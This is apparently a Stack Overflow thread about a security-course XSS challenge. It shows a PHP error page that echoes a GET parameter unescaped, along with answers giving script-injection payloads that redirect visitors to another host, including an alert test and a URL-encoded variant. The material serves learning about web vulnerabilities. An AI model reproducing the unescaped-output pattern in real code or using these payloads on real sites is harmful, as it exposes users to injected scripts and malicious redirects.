# xss attack on a php page

Tags: php, html, security, xss

In my security course teacher gave us a challenge to do so that we can practice with xss on a dummy website.
This website is composed by 2 php pages.
The first is called xss.php, and this is the code

```
<html>
<head>
<title>Equations</title>
</head>
<body>
<center>

<?php

if (isset($_POST['result'])){
$result = $_POST['result'];

if (intval($result) == 1){
    echo "<h1>Ok, you are able to solve simple equations </h1><br>";
}

if (intval($result) == 0) {
    header("Location: error.php?error=Type numbers!");
}

if (intval($result) != 1){
    echo "<h1>Wrong result! Try again.</h1>";
}
}

else { ?>

<h1>Can you solve equations?</h1>
<h2>x^2 - 2*x + 1</h2>
<form method=POST action="xss.php"> 
    <table>
    <tr> <td>x:</td> <td><input type=text name=result></td> </tr>
    </table>
    <input type=submit value=Submit />
    </form>
 </center>
</body>
</html>

<?php }
?>
```

the second is error.php, and it's this:

```
<html>
<head>
    <title>Error</title>
</head>
<body>
   <center>
      <h1>Error: <?php echo $_GET["error"]; ?></h1>
   <center>
</body>
</html>
```

the request is to redirect someone to another website (I'll call it "http://whatever.com/" ). When I start the challenge I'm in xss.php and the only thing I can do is writing something in the input form (the one with name=result). What can I write?? Thank you

Comment: I forgot an important thing. The answer we have to send to our teacher is the URL that I write to redirect the user to  _whatever.com_ . if I write 0 in the input form Im redirect to a page with URL: http://aaa.com/error.php?error=Type%20numbers! (I wrote aaa.com instead of the page we are using). I think I have to change also this URL writing something in the address bar, maybe, right?

Comment: Stackoverflow is not a place where others do your homeworks!

Answer (score 1):

You can pass by "error" GET variable a javascript code to redirect the page for whatever you want. 
To do it,you'll access

```
error.php?error=<script>window.location.href="http://youpageurl.com";</script>
```

Then you have to be redirected to "yourpageurl.com" website

Comment: what I write in the input form is saved in result. So I can just put 0 in it, and I will be redirected to error.php . right? then I changed the addres bar as you said but I wasn't redirected to any other page

Comment: Sorry, for a something reason the code that i've type was incorrect. I'm changing the code.

Comment: Ready, the stackoverflow page is blocking the "script" HTML tag... When you type what i said, type "script" without empty spaces...

Comment: it doesn't work... when I write it (without spaces) I remain in the page error.php  with "Error:" written on the screen  (before changing the address bar there's "Error:Type numbers!" on the screen, just to be clear)

Comment: Show me exaclty what you've typed, please.

Comment: before I typed something the url is http://something.com/error.php?error=Type%20numbers!   after I typed http://something.com/error.php?error=<script>window.location.href="http://mypage.com";</script>

Comment: @lucaggg Have you tried type < script >window.location.href = "http ://www.yoururlpage.com/";< /script > on error variable?

Comment: yes, I typed it on the address bar. It's the right place, i suppose, because what I write in the input form is saved in result variable, not error variable

Comment: What "other page" did you defined?

Answer (score 1):

An XSS attack is one in which the page allows allows users to inject script blocks into the rendered HTML. So, first you must figure out how to do that. For instance, if the input from the user gets displayed on the page and it isn't html escaped then a user could do the following:

User enters :

```
<script>alert('testing');</script>
```

Following that, if when when viewing the page an alert is shown then the page is vulnerable to XSS.

Therefore if the user enters JavaScript as follows:

```
<script>window.location.href = "http://www.whatever.com";</script>
```

The user would be redirected.

Comment: in the address bar I wrote : error.php?error=<script>window.location.href="http://mypage.com";</script>  but after pressing enter, the url changed in error.php?error=<script>window.location.href%20=%20"http://mypage.com";</script> (with %20 added) and didn't redirected to anything.

Comment: You could try url encoding it. ex : error=%3Cscript%3Ewindow.location.href%2520%3D%2520%22http%3A%2F%2Fwww.whatever.com%22%3B%3C%2Fscript%3E